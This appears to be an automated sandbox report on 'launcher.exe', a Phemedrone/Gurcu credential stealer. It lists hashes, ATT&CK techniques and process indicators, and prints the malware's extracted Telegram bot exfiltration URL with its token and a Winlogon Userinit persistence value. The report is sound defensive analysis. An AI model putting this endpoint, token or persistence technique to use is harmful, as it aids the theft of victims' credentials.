gurcu | daf046c6fde30cac7192ec01e228f3e3846226c25c1d9ce1418a725072e92daa

Analysis

max time kernel
115s
max time network
127s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
03-09-2024 16:26

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

launcher.exe
Size

547KB
MD5

f2fba58a1b4e538f062c10097b000a5f
SHA1

9596dc3926941749dc49631fb29043fa36ba5896
SHA256

daf046c6fde30cac7192ec01e228f3e3846226c25c1d9ce1418a725072e92daa
SHA512

d1880c07d977f565a36333ca5c3a59f0ac7cbd510858f2a5f5e3e3fdf7aaaeab18addb229e01b933d472bb487e52921a2bbee2db62ffc7e136d4e91ec00bf6a1
SSDEEP

12288:2JUu8hhhmQH4glUk5eZTsUuuc8B3zEjLPtf6J:2JIZmQH5OoeVjJlBQfPti

Score

10^/10

gurcu phemedrone credential_access execution persistence privilege_escalation spyware stealer

Malware Config

Extracted

Family

phemedrone

https://api.telegram.org/bot6766891578:AAE47sIyviQ0_skRFQtvxeYcndg1C8RFyo4/sendDocument

Extracted

Family

gurcu

https://api.telegram.org/bot6766891578:AAE47sIyviQ0_skRFQtvxeYcndg1C8RFyo4/sendDocumen

Signatures

Gurcu, WhiteSnake
Gurcu is a malware stealer written in C#.
stealer gurcu

Modifies WinLogon for persistence 2 TTPs 1 IoCs

persistence

Winlogon Helper DLL

T1547.004

Modify Registry

T1112

Processes:

calc.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit = "C:\\Windows\\System32\\userinit.exe,C:\\Windows\\xdwd"	calc.exe

Phemedrone
An information and wallet stealer written in C#.
stealer phemedrone
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
credential_access stealer

Credentials from Web Browsers
T1555.003
Blocklisted process makes network request 2 IoCs

Processes:

Sync Center.exe

flow pid process

64 3188 Sync Center.exe
65 3188 Sync Center.exe

flow	pid	process
64	3188	Sync Center.exe
65	3188	Sync Center.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 64 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
2240	powershell.exe
5468	powershell.exe
3664	powershell.exe
2780	powershell.exe
4244	powershell.exe
5408	powershell.exe
1132	powershell.exe
5612	powershell.exe
2512	powershell.exe
2940	powershell.exe
4072	powershell.exe
1940	powershell.exe
2168	powershell.exe
6016	powershell.exe
4324	powershell.exe
5944	powershell.exe
1608	powershell.exe
5096	powershell.exe
1656	powershell.exe
3532	powershell.exe
5112	powershell.exe
5892	powershell.exe
1916	powershell.exe
5816	powershell.exe
4364	powershell.exe
3024	powershell.exe
1292	powershell.exe
7064	powershell.exe
4364	powershell.exe
2524	powershell.exe
5760	powershell.exe
2512	powershell.exe
5724	powershell.exe
5584	powershell.exe
6012	powershell.exe
4400	powershell.exe
5932	powershell.exe
2824	powershell.exe
5244	powershell.exe
1916	powershell.exe
3464	powershell.exe
3916	powershell.exe
1228	powershell.exe
5020	powershell.exe
4856	powershell.exe
4512	powershell.exe
1408	powershell.exe
244	powershell.exe
4836	powershell.exe
5540	powershell.exe
3664	powershell.exe
4272	powershell.exe
4324	powershell.exe
3452	powershell.exe
1292	powershell.exe
2108	powershell.exe
3128	powershell.exe
5076	powershell.exe
4012	powershell.exe
1112	powershell.exe
1416	powershell.exe
5560	powershell.exe
5672	powershell.exe
888	powershell.exe

Event Triggered Execution: AppInit DLLs 1 TTPs
Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by AppInit DLLs loaded into processes.
persistence privilege_escalation

AppInit DLLs
T1546.010

Checks computer location settings 2 TTPs 40 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

launcher.exelauncher.exelauncher.exelauncher.exelauncher.exelauncher.exelauncher.exelauncher.exelauncher.exelauncher.exelauncher.exelauncher.exelauncher.exelauncher.exelauncher.exelauncher.exelauncher.exelauncher.exelauncher.exelauncher.exelauncher.exelauncher.exelauncher.exelauncher.exelauncher.exelauncher.exelauncher.exelauncher.exelauncher.exelauncher.exelauncher.exelauncher.exelauncher.exelauncher.exelauncher.exelauncher.exelauncher.exelauncher.exelauncher.exelauncher.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation	launcher.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation	launcher.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation	launcher.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation	launcher.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation	launcher.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation	launcher.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation	launcher.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation	launcher.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation	launcher.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation	launcher.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation	launcher.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation	launcher.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation	launcher.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation	launcher.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation	launcher.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation	launcher.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation	launcher.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation	launcher.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation	launcher.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation	launcher.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation	launcher.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation	launcher.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation	launcher.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation	launcher.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation	launcher.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation	launcher.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation	launcher.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation	launcher.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation	launcher.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation	launcher.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation	launcher.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation	launcher.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation	launcher.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation	launcher.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation	launcher.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation	launcher.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation	launcher.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation	launcher.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation	launcher.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation	launcher.exe

Executes dropped EXE 64 IoCs

Processes:

calc.exeSync Center.execalc.exeSync Center.execalc.exeSync Center.execalc.exeSync Center.execalc.exeSync Center.execalc.exeSync Center.execalc.exeSync Center.execalc.exeSync Center.execalc.exeSync Center.execalc.exeSync Center.execalc.exeSync Center.execalc.exeSync Center.execalc.exeSync Center.execalc.exeSync Center.execalc.exeSync Center.execalc.exeSync Center.execalc.exeSync Center.execalc.exeSync Center.exexdwdxdwdxdwdcalc.exexdwdxdwdSync Center.exexdwdxdwdxdwdxdwdxdwdxdwdxdwdxdwdxdwdxdwdxdwdxdwdcalc.exeSync Center.execalc.exeSync Center.execalc.exeSync Center.execalc.exeSync Center.execalc.exe

pid	process
964	calc.exe
3320	Sync Center.exe
548	calc.exe
4584	Sync Center.exe
3020	calc.exe
4584	Sync Center.exe
4512	calc.exe
940	Sync Center.exe
1656	calc.exe
1764	Sync Center.exe
1608	calc.exe
2088	Sync Center.exe
2716	calc.exe
5088	Sync Center.exe
4600	calc.exe
884	Sync Center.exe
684	calc.exe
5088	Sync Center.exe
4556	calc.exe
2088	Sync Center.exe
1492	calc.exe
3272	Sync Center.exe
3016	calc.exe
3188	Sync Center.exe
4324	calc.exe
884	Sync Center.exe
4688	calc.exe
3408	Sync Center.exe
4144	calc.exe
4856	Sync Center.exe
1080	calc.exe
1436	Sync Center.exe
2456	calc.exe
2828	Sync Center.exe
2976	calc.exe
4188	Sync Center.exe
2324	xdwd
2340	xdwd
2948	xdwd
4600	calc.exe
2300	xdwd
4760	xdwd
1648	Sync Center.exe
3464	xdwd
1920	xdwd
3212	xdwd
1660	xdwd
2524	xdwd
3784	xdwd
1412	xdwd
1284	xdwd
4120	xdwd
3488	xdwd
1764	xdwd
1036	xdwd
2996	calc.exe
3188	Sync Center.exe
3452	calc.exe
3932	Sync Center.exe
5424	calc.exe
5748	Sync Center.exe
2940	calc.exe
5620	Sync Center.exe
5488	calc.exe

Loads dropped DLL 64 IoCs

Processes:

powershell.exelauncher.exepowershell.execalc.exepowershell.exeSync Center.exepowershell.exelauncher.exepowershell.execalc.exepowershell.exeSync Center.exepowershell.exelauncher.exepowershell.execalc.exepowershell.exeSync Center.exepowershell.exelauncher.exepowershell.execalc.exepowershell.exeSync Center.exepowershell.exelauncher.exetaskmgr.exepowershell.execalc.exepowershell.exeSync Center.exe

pid	process
536
800
3452	powershell.exe
2408	launcher.exe
4216
2716
1660	powershell.exe
4332
1152
3020	calc.exe
3516
1696	powershell.exe
4584	Sync Center.exe
2636
3212
2992
1708	powershell.exe
2520
1892
2204	launcher.exe
3016
1656	powershell.exe
1860
2704
4512	calc.exe
4360
2240	powershell.exe
940	Sync Center.exe
1644
4584	powershell.exe
4996	launcher.exe
2080
392
1452
1588	powershell.exe
1656	calc.exe
5096
3016	powershell.exe
1764	Sync Center.exe
1620
2240
1684
4516	powershell.exe
1248	launcher.exe
1228
3120	powershell.exe
3308
1080
1608	calc.exe
1320
4364	powershell.exe
2088	Sync Center.exe
808
4492	powershell.exe
2948	launcher.exe
2288	taskmgr.exe
4516
1920
4432
2512	powershell.exe
2716	calc.exe
3792
888	powershell.exe
5088	Sync Center.exe

Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Drops file in Windows directory 2 IoCs

Processes:

calc.exe

description ioc process

File created C:\Windows\xdwd.dll calc.exe
File created C:\Windows\xdwd calc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

description	ioc	process
File created	C:\Windows\xdwd.dll	calc.exe
File created	C:\Windows\xdwd	calc.exe

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

taskmgr.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName	taskmgr.exe

Modifies registry class 1 IoCs

Processes:

taskmgr.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings taskmgr.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings	taskmgr.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 64 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid	process
6460	schtasks.exe
4272	schtasks.exe
2488	schtasks.exe
5072	schtasks.exe
5588	schtasks.exe
5100	schtasks.exe
5640	schtasks.exe
1272	schtasks.exe
3648	schtasks.exe
5860	schtasks.exe
5204	schtasks.exe
5612	schtasks.exe
1860	schtasks.exe
5044	schtasks.exe
4064	schtasks.exe
1248	schtasks.exe
4020	schtasks.exe
5600	schtasks.exe
5604	schtasks.exe
5816	schtasks.exe
4272	schtasks.exe
4976	schtasks.exe
5804	schtasks.exe
2456	schtasks.exe
5332	schtasks.exe
4064	schtasks.exe
1320	schtasks.exe
4580	schtasks.exe
4332	schtasks.exe
1644	schtasks.exe
5316	schtasks.exe
6028	schtasks.exe
2300	schtasks.exe
1680	schtasks.exe
1588	schtasks.exe
1828	schtasks.exe
5932	schtasks.exe
5316	schtasks.exe
1016	schtasks.exe
5252	schtasks.exe
6452	schtasks.exe
2780	schtasks.exe
1920	schtasks.exe
4220	schtasks.exe
652	schtasks.exe
3584	schtasks.exe
2856	schtasks.exe
1436	schtasks.exe
6132	schtasks.exe
3552	schtasks.exe
3456	schtasks.exe
2404	schtasks.exe
5076	schtasks.exe
4556	schtasks.exe
5284	schtasks.exe
1280	schtasks.exe
3664	schtasks.exe
3464	schtasks.exe
5492	schtasks.exe
1132	schtasks.exe
1736	schtasks.exe
3016	schtasks.exe
5260	schtasks.exe
2216	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exepowershell.exepowershell.exeSync Center.exepowershell.exepowershell.exepowershell.exeSync Center.exepowershell.exelauncher.exepowershell.execalc.exepowershell.exeSync Center.exepowershell.exelauncher.exepowershell.execalc.exepowershell.exeSync Center.exepowershell.exe

pid	process
4364	powershell.exe
4364	powershell.exe
3024	powershell.exe
3024	powershell.exe
3452	powershell.exe
3452	powershell.exe
3320	Sync Center.exe
3068	powershell.exe
3068	powershell.exe
244	powershell.exe
244	powershell.exe
244	powershell.exe
3664	powershell.exe
3664	powershell.exe
3664	powershell.exe
4584	Sync Center.exe
3452	powershell.exe
3452	powershell.exe
3452	powershell.exe
3452	powershell.exe
3452	powershell.exe
2408	launcher.exe
2408	launcher.exe
1660	powershell.exe
1660	powershell.exe
1660	powershell.exe
1660	powershell.exe
1660	powershell.exe
3020	calc.exe
3020	calc.exe
1696	powershell.exe
1696	powershell.exe
1696	powershell.exe
1696	powershell.exe
1696	powershell.exe
4584	Sync Center.exe
4584	Sync Center.exe
4584	Sync Center.exe
4584	Sync Center.exe
1708	powershell.exe
1708	powershell.exe
1708	powershell.exe
1708	powershell.exe
2204	launcher.exe
2204	launcher.exe
1656	powershell.exe
1656	powershell.exe
1656	powershell.exe
1656	powershell.exe
1656	powershell.exe
4512	calc.exe
4512	calc.exe
2240	powershell.exe
2240	powershell.exe
2240	powershell.exe
2240	powershell.exe
2240	powershell.exe
940	Sync Center.exe
940	Sync Center.exe
940	Sync Center.exe
940	Sync Center.exe
4584	powershell.exe
4584	powershell.exe
4584	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exepowershell.exepowershell.exeSync Center.execalc.exepowershell.exepowershell.exepowershell.execalc.exeSync Center.exepowershell.exepowershell.exepowershell.execalc.exeSync Center.exepowershell.exepowershell.execalc.exepowershell.exeSync Center.exepowershell.exepowershell.exepowershell.execalc.exeSync Center.exepowershell.exepowershell.exepowershell.execalc.exeSync Center.exepowershell.exetaskmgr.exepowershell.exepowershell.execalc.exeSync Center.exepowershell.exepowershell.exepowershell.execalc.exeSync Center.exepowershell.exepowershell.exepowershell.execalc.exeSync Center.exepowershell.exepowershell.exepowershell.execalc.exeSync Center.exepowershell.exepowershell.exepowershell.execalc.exeSync Center.exepowershell.exepowershell.exepowershell.execalc.exeSync Center.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	4364	powershell.exe
Token: SeDebugPrivilege	3024	powershell.exe
Token: SeDebugPrivilege	3452	powershell.exe
Token: SeDebugPrivilege	3320	Sync Center.exe
Token: SeDebugPrivilege	964	calc.exe
Token: SeDebugPrivilege	3068	powershell.exe
Token: SeDebugPrivilege	244	powershell.exe
Token: SeDebugPrivilege	3664	powershell.exe
Token: SeDebugPrivilege	548	calc.exe
Token: SeDebugPrivilege	4584	Sync Center.exe
Token: SeDebugPrivilege	3452	powershell.exe
Token: SeDebugPrivilege	1660	powershell.exe
Token: SeDebugPrivilege	1696	powershell.exe
Token: SeDebugPrivilege	3020	calc.exe
Token: SeDebugPrivilege	4584	Sync Center.exe
Token: SeDebugPrivilege	1708	powershell.exe
Token: SeDebugPrivilege	1656	powershell.exe
Token: SeDebugPrivilege	4512	calc.exe
Token: SeDebugPrivilege	2240	powershell.exe
Token: SeDebugPrivilege	940	Sync Center.exe
Token: SeDebugPrivilege	4584	powershell.exe
Token: SeDebugPrivilege	1588	powershell.exe
Token: SeDebugPrivilege	3016	powershell.exe
Token: SeDebugPrivilege	1656	calc.exe
Token: SeDebugPrivilege	1764	Sync Center.exe
Token: SeDebugPrivilege	4516	powershell.exe
Token: SeDebugPrivilege	3120	powershell.exe
Token: SeDebugPrivilege	4364	powershell.exe
Token: SeDebugPrivilege	1608	calc.exe
Token: SeDebugPrivilege	2088	Sync Center.exe
Token: SeDebugPrivilege	4492	powershell.exe
Token: SeDebugPrivilege	2288	taskmgr.exe
Token: SeSystemProfilePrivilege	2288	taskmgr.exe
Token: SeCreateGlobalPrivilege	2288	taskmgr.exe
Token: SeDebugPrivilege	2512	powershell.exe
Token: SeDebugPrivilege	888	powershell.exe
Token: SeDebugPrivilege	2716	calc.exe
Token: SeDebugPrivilege	5088	Sync Center.exe
Token: SeDebugPrivilege	5044	powershell.exe
Token: SeDebugPrivilege	4400	powershell.exe
Token: SeDebugPrivilege	3128	powershell.exe
Token: SeDebugPrivilege	4600	calc.exe
Token: SeDebugPrivilege	884	Sync Center.exe
Token: SeDebugPrivilege	2940	powershell.exe
Token: SeDebugPrivilege	5076	powershell.exe
Token: SeDebugPrivilege	3212	powershell.exe
Token: SeDebugPrivilege	684	calc.exe
Token: SeDebugPrivilege	5088	Sync Center.exe
Token: SeDebugPrivilege	2132	powershell.exe
Token: SeDebugPrivilege	936	powershell.exe
Token: SeDebugPrivilege	4012	powershell.exe
Token: SeDebugPrivilege	4556	calc.exe
Token: SeDebugPrivilege	2088	Sync Center.exe
Token: SeDebugPrivilege	4072	powershell.exe
Token: SeDebugPrivilege	5104	powershell.exe
Token: SeDebugPrivilege	2024	powershell.exe
Token: SeDebugPrivilege	1492	calc.exe
Token: SeDebugPrivilege	3272	Sync Center.exe
Token: SeDebugPrivilege	5020	powershell.exe
Token: SeDebugPrivilege	3532	powershell.exe
Token: SeDebugPrivilege	2524	powershell.exe
Token: SeDebugPrivilege	3016	calc.exe
Token: SeDebugPrivilege	3188	Sync Center.exe
Token: SeDebugPrivilege	4564	powershell.exe

Suspicious use of FindShellTrayWindow 64 IoCs

Processes:

taskmgr.exe

pid	process
2288	taskmgr.exe
2288	taskmgr.exe
2288	taskmgr.exe
2288	taskmgr.exe
2288	taskmgr.exe
2288	taskmgr.exe
2288	taskmgr.exe
2288	taskmgr.exe
2288	taskmgr.exe
2288	taskmgr.exe
2288	taskmgr.exe
2288	taskmgr.exe
2288	taskmgr.exe
2288	taskmgr.exe
2288	taskmgr.exe
2288	taskmgr.exe
2288	taskmgr.exe
2288	taskmgr.exe
2288	taskmgr.exe
2288	taskmgr.exe
2288	taskmgr.exe
2288	taskmgr.exe
2288	taskmgr.exe
2288	taskmgr.exe
2288	taskmgr.exe
2288	taskmgr.exe
2288	taskmgr.exe
2288	taskmgr.exe
2288	taskmgr.exe
2288	taskmgr.exe
2288	taskmgr.exe
2288	taskmgr.exe
2288	taskmgr.exe
2288	taskmgr.exe
2288	taskmgr.exe
2288	taskmgr.exe
2288	taskmgr.exe
2288	taskmgr.exe
2288	taskmgr.exe
2288	taskmgr.exe
2288	taskmgr.exe
2288	taskmgr.exe
2288	taskmgr.exe
2288	taskmgr.exe
2288	taskmgr.exe
2288	taskmgr.exe
2288	taskmgr.exe
2288	taskmgr.exe
2288	taskmgr.exe
2288	taskmgr.exe
2288	taskmgr.exe
2288	taskmgr.exe
2288	taskmgr.exe
2288	taskmgr.exe
2288	taskmgr.exe
2288	taskmgr.exe
2288	taskmgr.exe
2288	taskmgr.exe
2288	taskmgr.exe
2288	taskmgr.exe
2288	taskmgr.exe
2288	taskmgr.exe
2288	taskmgr.exe
2288	taskmgr.exe

Suspicious use of SendNotifyMessage 64 IoCs

Processes:

taskmgr.exe

pid	process
2288	taskmgr.exe
2288	taskmgr.exe
2288	taskmgr.exe
2288	taskmgr.exe
2288	taskmgr.exe
2288	taskmgr.exe
2288	taskmgr.exe
2288	taskmgr.exe
2288	taskmgr.exe
2288	taskmgr.exe
2288	taskmgr.exe
2288	taskmgr.exe
2288	taskmgr.exe
2288	taskmgr.exe
2288	taskmgr.exe
2288	taskmgr.exe
2288	taskmgr.exe
2288	taskmgr.exe
2288	taskmgr.exe
2288	taskmgr.exe
2288	taskmgr.exe
2288	taskmgr.exe
2288	taskmgr.exe
2288	taskmgr.exe
2288	taskmgr.exe
2288	taskmgr.exe
2288	taskmgr.exe
2288	taskmgr.exe
2288	taskmgr.exe
2288	taskmgr.exe
2288	taskmgr.exe
2288	taskmgr.exe
2288	taskmgr.exe
2288	taskmgr.exe
2288	taskmgr.exe
2288	taskmgr.exe
2288	taskmgr.exe
2288	taskmgr.exe
2288	taskmgr.exe
2288	taskmgr.exe
2288	taskmgr.exe
2288	taskmgr.exe
2288	taskmgr.exe
2288	taskmgr.exe
2288	taskmgr.exe
2288	taskmgr.exe
2288	taskmgr.exe
2288	taskmgr.exe
2288	taskmgr.exe
2288	taskmgr.exe
2288	taskmgr.exe
2288	taskmgr.exe
2288	taskmgr.exe
2288	taskmgr.exe
2288	taskmgr.exe
2288	taskmgr.exe
2288	taskmgr.exe
2288	taskmgr.exe
2288	taskmgr.exe
2288	taskmgr.exe
2288	taskmgr.exe
2288	taskmgr.exe
2288	taskmgr.exe
2288	taskmgr.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

launcher.exelauncher.execalc.execmd.exelauncher.execmd.execalc.execmd.execmd.exelauncher.execalc.exe

description	pid	process	target process
PID 1492 wrote to memory of 4364	1492	launcher.exe	powershell.exe
PID 1492 wrote to memory of 4364	1492	launcher.exe	powershell.exe
PID 1492 wrote to memory of 4676	1492	launcher.exe	launcher.exe
PID 1492 wrote to memory of 4676	1492	launcher.exe	launcher.exe
PID 1492 wrote to memory of 3024	1492	launcher.exe	powershell.exe
PID 1492 wrote to memory of 3024	1492	launcher.exe	powershell.exe
PID 1492 wrote to memory of 964	1492	launcher.exe	calc.exe
PID 1492 wrote to memory of 964	1492	launcher.exe	calc.exe
PID 1492 wrote to memory of 3452	1492	launcher.exe	powershell.exe
PID 1492 wrote to memory of 3452	1492	launcher.exe	powershell.exe
PID 1492 wrote to memory of 3320	1492	launcher.exe	Sync Center.exe
PID 1492 wrote to memory of 3320	1492	launcher.exe	Sync Center.exe
PID 4676 wrote to memory of 3068	4676	launcher.exe	powershell.exe
PID 4676 wrote to memory of 3068	4676	launcher.exe	powershell.exe
PID 4676 wrote to memory of 3908	4676	launcher.exe	launcher.exe
PID 4676 wrote to memory of 3908	4676	launcher.exe	launcher.exe
PID 4676 wrote to memory of 244	4676	launcher.exe	powershell.exe
PID 4676 wrote to memory of 244	4676	launcher.exe	powershell.exe
PID 4676 wrote to memory of 548	4676	launcher.exe	calc.exe
PID 4676 wrote to memory of 548	4676	launcher.exe	calc.exe
PID 4676 wrote to memory of 3664	4676	launcher.exe	powershell.exe
PID 4676 wrote to memory of 3664	4676	launcher.exe	powershell.exe
PID 4676 wrote to memory of 4584	4676	launcher.exe	Sync Center.exe
PID 4676 wrote to memory of 4584	4676	launcher.exe	Sync Center.exe
PID 964 wrote to memory of 3468	964	calc.exe	CMD.exe
PID 964 wrote to memory of 3468	964	calc.exe	CMD.exe
PID 964 wrote to memory of 1580	964	calc.exe	cmd.exe
PID 964 wrote to memory of 1580	964	calc.exe	cmd.exe
PID 964 wrote to memory of 3120	964	calc.exe	cmd.exe
PID 964 wrote to memory of 3120	964	calc.exe	cmd.exe
PID 1580 wrote to memory of 2684	1580	cmd.exe	schtasks.exe
PID 1580 wrote to memory of 2684	1580	cmd.exe	schtasks.exe
PID 3908 wrote to memory of 3452	3908	launcher.exe	powershell.exe
PID 3908 wrote to memory of 3452	3908	launcher.exe	powershell.exe
PID 3120 wrote to memory of 2780	3120	cmd.exe	schtasks.exe
PID 3120 wrote to memory of 2780	3120	cmd.exe	schtasks.exe
PID 3908 wrote to memory of 2408	3908	launcher.exe	launcher.exe
PID 3908 wrote to memory of 2408	3908	launcher.exe	launcher.exe
PID 3908 wrote to memory of 1660	3908	launcher.exe	powershell.exe
PID 3908 wrote to memory of 1660	3908	launcher.exe	powershell.exe
PID 548 wrote to memory of 5004	548	calc.exe	cmd.exe
PID 548 wrote to memory of 5004	548	calc.exe	cmd.exe
